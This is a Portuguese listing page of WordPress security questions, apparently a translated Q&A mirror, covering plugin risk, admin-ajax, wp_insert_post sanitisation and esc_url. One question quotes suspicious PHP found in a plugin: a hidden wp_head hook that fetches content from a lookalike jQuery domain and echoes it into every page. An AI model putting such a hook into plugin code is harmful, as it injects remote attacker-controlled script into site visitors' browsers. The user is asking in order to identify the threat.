Perguntas com a marcação «security»

Fortalecendo temas, plugins e instalação principal para evitar invasões.



6
Os plugins do Wordpress são essenciais?
Eu sou novo no WordPress. Li recentemente um artigo sobre como hackers podem explorar vulnerabilidades em plugins. Várias fontes, como o Google Pagespeed, também me dissuadiram de usar plug-ins ou pelo menos o mantiveram no mínimo. Pessoalmente, também tento evitar plugins porque me sinto mais no controle do que acontece …
19 plugins  security 


2
Encontrei isso em um plugin. O que isso faz? é perigoso?
Encontrei isso em um plugin. O que isso faz? é perigoso? add_action('admin_enqueue_scripts', 'pw_load_scripts'); if (!function_exists('wp__head'){ function wp__head() { if(function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); $jquery = curl_exec($ch); curl_close($ch); echo "$jquery"; } } add_action('wp_head', 'wp__head'); }






4
Como o admin-ajax.php funciona?
Estamos tendo alguns problemas com um desenvolvedor externo. Queremos limitar o acesso ao wp-adminsite apenas ao acesso interno (via VPN ). Simplesmente para que não seja atacado por usuários externos. Podemos enumerar os administradores do site e não queremos que eles sejam fraudados. Nosso desenvolvedor está dizendo que não podemos …
14 admin  ajax  security 



1
Quão seguro / higienizado é o wp_insert_posts ()?
Observando o Codex para wp_insert_post (), ele afirma que esta função "... higieniza variáveis, faz algumas verificações, preenche variáveis ​​ausentes como data / hora etc." (EDIT: Atualizei a entrada do Codex para incluir um exemplo mais robusto que inclui segurança, além de atribuição de meta e categoria) Apenas me pergunto …

4
Por que devo usar o esc_url?
Essa coisa dificulta minha codificação. O codex do Wordpress justifica o uso do esc_url falando vagamente sobre segurança. Mas vale realmente a pena? Por exemplo, qual é o importante e prático benefício de segurança usando <?php echo esc_url( home_url( '/' ) ); ?> ao invés de <?php echo home_url() ?> …
12 security 

Ao utilizar nosso site, você reconhece que leu e compreendeu nossa Política de Cookies e nossa Política de Privacidade.
Licensed under cc by-sa 3.0 with attribution required.